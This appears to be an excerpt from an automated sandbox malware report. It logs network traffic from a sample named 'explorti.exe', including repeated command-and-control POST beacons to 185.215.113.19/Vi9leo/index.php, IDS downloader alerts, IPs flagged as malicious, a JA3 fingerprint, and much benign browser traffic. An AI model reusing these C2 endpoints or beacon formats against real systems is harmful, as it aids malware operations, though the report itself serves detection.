Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.100 185.215.113.100
Source: Joe Sandbox View IP Address: 152.195.19.97 152.195.19.97
Source: Joe Sandbox View IP Address: 13.107.246.60 13.107.246.60
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49743 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49742 -> 185.215.113.100:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /assets/arbitration_priority_list/4.0.5/asset?assetgroup=ArbitrationService HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ArbitrationServiceSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveAccept: */*Access-Control-Request-Method: POSTAccess-Control-Request-Headers: x-goog-authuserOrigin: https://accounts.google.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Sec-Fetch-Mode: corsSec-Fetch-Site: same-siteSec-Fetch-Dest: emptyReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9
Source: global traffic HTTP traffic detected: OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveAccept: */*Access-Control-Request-Method: POSTAccess-Control-Request-Headers: x-goog-authuserOrigin: https://accounts.google.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Sec-Fetch-Mode: corsSec-Fetch-Site: same-siteSec-Fetch-Dest: emptyReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.2045.47"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9
Source: global traffic HTTP traffic detected: GET /crx/blobs/AY4GWKBMNax_FQrZEVzNkO_0mu3UShnzR6AihR_EPjVIUOT_pwZzkWCpOk8YKIu0qnIq_YObWXuPyiJ7NA0nDjMHUEYIIEknsNvJHXuPd0MqxESzoxi9xiMyJKNwZiVV1yEAxlKa5UVe61sINARQ7fO9dE0bkfP_W4GG/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_80_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/arbitration_priority_list/4.0.5/asset?assetgroup=ArbitrationService HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ArbitrationServiceSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1725764978&P2=404&P3=2&P4=WBb34KuFQqMwDM0qCf5hz6r9hwUe5kC8GPtmqdap%2fkx%2fUQ2ctKkN0FeRtfBg52MWh%2be0L4CPD6GZPQj%2b20%2fKxQ%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: ijXf796fROVwWTc8/tYMCuSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: unknown TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00AFBD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 6_2_00AFBD60
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=MlZXXSS8OOahzWV&MD=pbZWEaDG HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=MlZXXSS8OOahzWV&MD=pbZWEaDG HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /assets/arbitration_priority_list/4.0.5/asset?assetgroup=ArbitrationService HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ArbitrationServiceSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.2045.47"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9
Source: global traffic HTTP traffic detected: GET /crx/blobs/AY4GWKBMNax_FQrZEVzNkO_0mu3UShnzR6AihR_EPjVIUOT_pwZzkWCpOk8YKIu0qnIq_YObWXuPyiJ7NA0nDjMHUEYIIEknsNvJHXuPd0MqxESzoxi9xiMyJKNwZiVV1yEAxlKa5UVe61sINARQ7fO9dE0bkfP_W4GG/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_80_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/arbitration_priority_list/4.0.5/asset?assetgroup=ArbitrationService HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ArbitrationServiceSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
